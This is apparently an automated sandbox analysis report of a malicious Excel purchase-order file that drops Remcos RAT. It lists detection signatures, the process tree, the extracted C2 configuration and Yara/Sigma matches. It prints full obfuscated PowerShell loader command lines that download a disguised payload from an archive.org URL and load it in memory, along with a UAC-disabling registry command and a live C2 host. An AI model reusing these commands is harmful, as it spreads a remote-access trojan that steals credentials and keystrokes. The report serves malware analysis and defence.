
Windows Analysis Report
PO_304234.xls

Overview

General Information

Sample name: PO_304234.xls
Analysis ID: 1500265
MD5: ac30e3d8b0557592e89bdca3e6b4e879
SHA1: d484bca1c79af754eced69d18348c2a5e8cbe325
SHA256: adf8f2babc9a03e459102fd4290645fd46ae83f3001e581a7735f592449fd421
Tags: xls

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3528 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3776 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3888 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3912 cmdline: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 4012 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 4020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 blob removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 2848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 3024 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 1960 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1704 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2640 cmdline: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3588 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3844 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 blob removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{
  "Host:Port:Password": "cloudsave.duckdns.org:14645:1",
  "Assigned name": "zynova",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-CJ3HJ1",
  "Keylog flag": "0",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Yara matches (memory dumps):
Source | Rule | Description | Author
0000001C.00000002.476275781.0000000000511000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.842095725.0000000000631000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.842095725.0000000000615000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
(5 of 27 entries shown)
Yara matches (unpacked PEs):
Source | Rule | Description | Author
28.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
28.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
28.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
28.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  Strings:
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
28.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  Strings:
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
(5 of 19 entries shown)

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? 
? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetworkroundthings[1].hta
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = 
[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ?
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'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'+[cHAR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3912, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" , ProcessId: 3104, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? 